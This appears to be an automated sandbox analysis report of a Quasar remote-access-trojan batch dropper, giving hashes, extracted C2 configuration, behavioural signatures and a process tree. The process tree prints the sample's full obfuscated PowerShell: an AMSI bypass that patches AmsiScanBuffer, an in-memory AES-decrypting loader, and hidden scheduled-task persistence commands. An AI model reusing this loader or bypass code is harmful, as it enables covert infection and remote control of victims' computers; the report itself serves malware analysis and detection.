Analysis
-
max time kernel
94s -
max time network
75s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
26-05-2024 19:38
General
-
Target
$77-Built.bat
-
Size
3.5MB
-
MD5
297d7e65305917b5a212ca9f4b4d99d2
-
SHA1
402192fd3b13ea1fd26403e227ceb119e8569b4c
-
SHA256
cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
-
SHA512
6055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
-
SSDEEP
49152:cYbGAyBfhKnc19015vyfIchfKpcuGj8RmSMvANLFt/X9oS4ot3X3tLdDh:cG
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
reconnect_delay
3000
Extracted
Family
quasar
Version
1.4.1
Botnet
Rootkit
C2
uk2.localto.net:3444
Mutex
13b8023a-5596-4efa-b088-c87d2ca4e84f
Attributes
-
encryption_key
6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
-
install_name
$77-powershell.exe
-
log_directory
$77-Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77-Rootkit
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 4 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 54 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a9962185-de96-47e2-81e1-42ac93f7d47d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:saqiUXlVcqAq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PSLaSDpbXJXEtw,[Parameter(Position=1)][Type]$vqZhVhUbcV)$WdpJNpaSkaF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'m'+'o'+''+'r'+'y'+[Char](77)+'odu'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WdpJNpaSkaF.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+'i'+'a'+'l'+'N'+''+'a'+''+[Char](109)+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PSLaSDpbXJXEtw).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$WdpJNpaSkaF.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+'e'+'','Pu'+[Char](98)+'l'+'i'+'c,'+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+'i'+[Char](114)+'tua'+[Char](108)+'',$vqZhVhUbcV,$PSLaSDpbXJXEtw).SetImplementationFlags('Ru'+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $WdpJNpaSkaF.CreateType();}$JNxYBubUArsrC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+'o'+''+'s'+''+[Char](111)+'f'+[Char](116)+'.'+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$czVTGRviZAoAEU=$JNxYBubUArsrC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'St'+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$taeCbgsaORVduzLIRuU=saqiUXlVcqAq @([String])([IntPtr]);$ZcjYYgiyfiVsXqKtVykqyV=saqiUXlVcqAq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$enDmrgitdIj=$JNxYBubUArsrC.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+''+'H'+'a'+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+'e'+'l'+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+'l')));$UUoaRuoLlSfFLX=$czVTGRviZAoAEU.Invoke($Null,@([Object]$enDmrgitdIj,[Object](''+'L'+''+'o'+'a'+'d'+'L'+'i'+'b'+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$zqSyzybdBtgskHbak=$czVTGRviZAoAEU.Invoke($Null,@([Object]$enDmrgitdIj,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+'al'+[Char](80)+''+'r'+''+[Char](111)+'te'+[Char](99)+'t')));$gibEDTV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UUoaRuoLlSfFLX,$taeCbgsaORVduzLIRuU).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$IOXeJSTBLGjtKZhkP=$czVTGRviZAoAEU.Invoke($Null,@([Object]$gibEDTV,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$SzEoKryFvd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zqSyzybdBtgskHbak,$ZcjYYgiyfiVsXqKtVykqyV).Invoke($IOXeJSTBLGjtKZhkP,[uint32]8,4,[ref]$SzEoKryFvd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IOXeJSTBLGjtKZhkP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zqSyzybdBtgskHbak,$ZcjYYgiyfiVsXqKtVykqyV).Invoke($IOXeJSTBLGjtKZhkP,[uint32]8,0x20,[ref]$SzEoKryFvd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77-Built.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$77-Built.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$77-Built.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_182_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_182.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_182.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_182.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_182.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_182.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ab64146204d66061fe4c21f85f2c5716
SHA1356e840a0baf272181fa336020201f53ecfd56d8
SHA2567a0e5fda0f4b068cd5dc8834d2b45a1102219e606098d0de27f6d331d14ef7c9
SHA51250fb9c39b7b9ef62f06b8c8eace49734b1f3ce22a5e20eab2da342e2bdc12316b0f06ba12b09fcac0c53a39c606daced67605e67517e9e606fb639f9522b1913
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exeFilesize
3.1MB
MD54de93a204d54204a0798175c8457a2de
SHA138abe30fa70c599846e0b777d4ee62422781837f
SHA2567333499e805ad534c6f65623adf4600c0484830cefa08c0a75f98b46a929fefb
SHA512e3ae4e2c84dec014dd15bc29faa9767214972eef8bdee9db063f4fbe059549212f17c69f06a78a12880f53a766e357c73eae6763f2452fb4eff2302f5396304a
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
163KB
MD5b51552b77057c2405f73bbbf9c89234a
SHA14793adbba023f90d2d2ad0ec55199c56de815224
SHA256720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hy0prbld.l4r.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exeFilesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
C:\Users\Admin\AppData\Roaming\startup_str_182.batFilesize
3.5MB
MD5297d7e65305917b5a212ca9f4b4d99d2
SHA1402192fd3b13ea1fd26403e227ceb119e8569b4c
SHA256cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
SHA5126055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
-
C:\Users\Admin\AppData\Roaming\startup_str_182.vbsFilesize
115B
MD544116e0e2772e08deeb73293aac7ea83
SHA16bd666f79b09fbc06c56b13f62ef024e58878e84
SHA256acd5d5d605e00fe7b43206e13818a080f7d11105077f7a988a35f7db1c44cb2b
SHA512b67ad508a826b490d2b38731fa177f9cd67841ac4d04ce137dc8fd02e598ce124b150a2d67e67b6abbda800d1b217b3ab550aedfcf19fa6e7b0dbfc12cc6697d
-
memory/552-185-0x00000207145E0000-0x000002071460A000-memory.dmpFilesize
168KB
-
memory/552-191-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmpFilesize
64KB
-
memory/552-184-0x00000207145E0000-0x000002071460A000-memory.dmpFilesize
168KB
-
memory/552-190-0x00000207145E0000-0x000002071460A000-memory.dmpFilesize
168KB
-
memory/552-183-0x00000207141E0000-0x0000020714205000-memory.dmpFilesize
148KB
-
memory/632-200-0x0000019AD86D0000-0x0000019AD86FA000-memory.dmpFilesize
168KB
-
memory/632-195-0x0000019AD86D0000-0x0000019AD86FA000-memory.dmpFilesize
168KB
-
memory/632-201-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmpFilesize
64KB
-
memory/724-211-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmpFilesize
64KB
-
memory/724-210-0x00000201D7910000-0x00000201D793A000-memory.dmpFilesize
168KB
-
memory/724-205-0x00000201D7910000-0x00000201D793A000-memory.dmpFilesize
168KB
-
memory/900-221-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmpFilesize
64KB
-
memory/900-215-0x0000021B123E0000-0x0000021B1240A000-memory.dmpFilesize
168KB
-
memory/900-220-0x0000021B123E0000-0x0000021B1240A000-memory.dmpFilesize
168KB
-
memory/916-136-0x00000000009D0000-0x0000000000CF4000-memory.dmpFilesize
3.1MB
-
memory/1000-225-0x00000164F0D10000-0x00000164F0D3A000-memory.dmpFilesize
168KB
-
memory/1000-230-0x00000164F0D10000-0x00000164F0D3A000-memory.dmpFilesize
168KB
-
memory/1000-231-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmpFilesize
64KB
-
memory/1056-41-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/1056-74-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/1056-42-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/2792-172-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2792-169-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2792-180-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2792-179-0x00007FFFA9410000-0x00007FFFA94BE000-memory.dmpFilesize
696KB
-
memory/2792-170-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2792-171-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2792-178-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/2792-174-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4224-118-0x0000020C7B110000-0x0000020C7B434000-memory.dmpFilesize
3.1MB
-
memory/4516-166-0x000001FC9A650000-0x000001FC9A67A000-memory.dmpFilesize
168KB
-
memory/4516-167-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/4516-168-0x00007FFFA9410000-0x00007FFFA94BE000-memory.dmpFilesize
696KB
-
memory/5028-4-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/5028-28-0x00000266C6FC0000-0x00000266C6FC8000-memory.dmpFilesize
32KB
